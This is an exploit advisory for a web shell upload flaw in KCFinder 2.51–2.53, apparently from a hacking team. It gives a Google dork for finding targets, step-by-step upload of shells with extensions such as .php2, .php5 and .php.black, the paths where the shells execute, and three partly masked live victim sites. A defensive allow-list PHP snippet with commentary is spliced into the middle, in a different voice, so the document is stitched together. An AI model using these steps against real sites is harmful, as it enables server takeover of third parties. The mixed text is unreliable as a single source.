Exploit Title : KCFinder Upload Shell Vulnerability
Date : 24/04/2014
Google Dork : inurl:/kcfinder/browse.php
Exploit Author : Iranian_Dark_Coders_Team
Home : http://www.idc-team.net
Discovered By : Black.Hack3r
Vendor Homepage : http://kcfinder.sunhater.com/
Version : 2.51 – 2.53
Tested on : Windows 8 & Linux

Vulnerable code location:

http://[localhost]/[path]/kcfinder/config.php

Line 51: 'deniedExts' => "exe com msi bat php phps phtml php3 php4 cgi pl",
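The deny-list above is the root cause: anything not named in it passes, so alternative PHP extensions and double extensions get through. As an added example (not KCFinder's code; the function name and the permitted extension list are constructed for illustration), this is the allow-list form of the check a hardened upload filter would use, validating every dotted component of the name rather than only the last one:

```php
<?php
// Added example: allow-list based upload name check (not KCFinder code).
// The advisory's deny-list misses extensions it never mentions and the
// double-extension form "shell.php.black"; an allow-list over every
// extension component rejects anything not explicitly permitted.

function isUploadNameAllowed(string $filename): bool
{
    // Only these extensions are ever accepted (constructed example list).
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

    // Strip any path component a client might smuggle in.
    $base = basename(str_replace('\\', '/', $filename));

    $parts = explode('.', strtolower($base));
    if (count($parts) < 2 || $parts[0] === '') {
        return false; // no extension, or a dotfile such as ".htaccess"
    }
    // Every component after the stem must be on the allow-list, so
    // "shell.php.black", "x.php5" and "x.shtml" are all rejected.
    foreach (array_slice($parts, 1) as $ext) {
        if ($ext === '' || !in_array($ext, $allowed, true)) {
            return false;
        }
    }
    return true;
}

// Self-check against the names from this advisory plus a benign one.
$cases = [
    'shell.php2'      => false,
    'shell.php5'      => false,
    'shell.php.black' => false,
    'shell.shtml'     => false,
    'defpage.html'    => false,
    '.htaccess'       => false,
    'photo.JPG'       => true,
];
foreach ($cases as $name => $expected) {
    assert(isUploadNameAllowed($name) === $expected);
}
```

Name validation alone is not sufficient: the upload directory should also be served with script execution disabled so that a file that slips through is never interpreted by PHP.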

Exploit:

http://[localhost]/kcfinder/browse.php
http://[localhost]/[path]/kcfinder/browse.php

Proof:

STEP 1: Go to target link
http://localhost/KCFinder/browse.php

STEP 2: Then select your folder from the left panel

STEP 3: Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & defpage.html ]

STEP 4: Shell execution path

http://[localhost]/[path]/files/shell.php2
OR
http://[localhost]/[path]/files/files/shell.php2

Demo site:

http://www.basuXkiwater.com/assets/js/mylibs/kcfinder/browse.php
http://www.padeXl4u2.be/kcfinder/browse.php
http://goyathlayXsvintagepavonirestorations.com/kcfinder/browse.php

Discovered By : Black.Hack3r
We Are : M.R.S.CO,Black.Hack3r,N3O,[email protected][email protected],KurD_HaCK3R,HOt0N
SpTnx : Sec4ever,HashoR,@3is,Security,M4H4N,Mr.Cicili And All IDC Member
Home : http://www.idc-team.net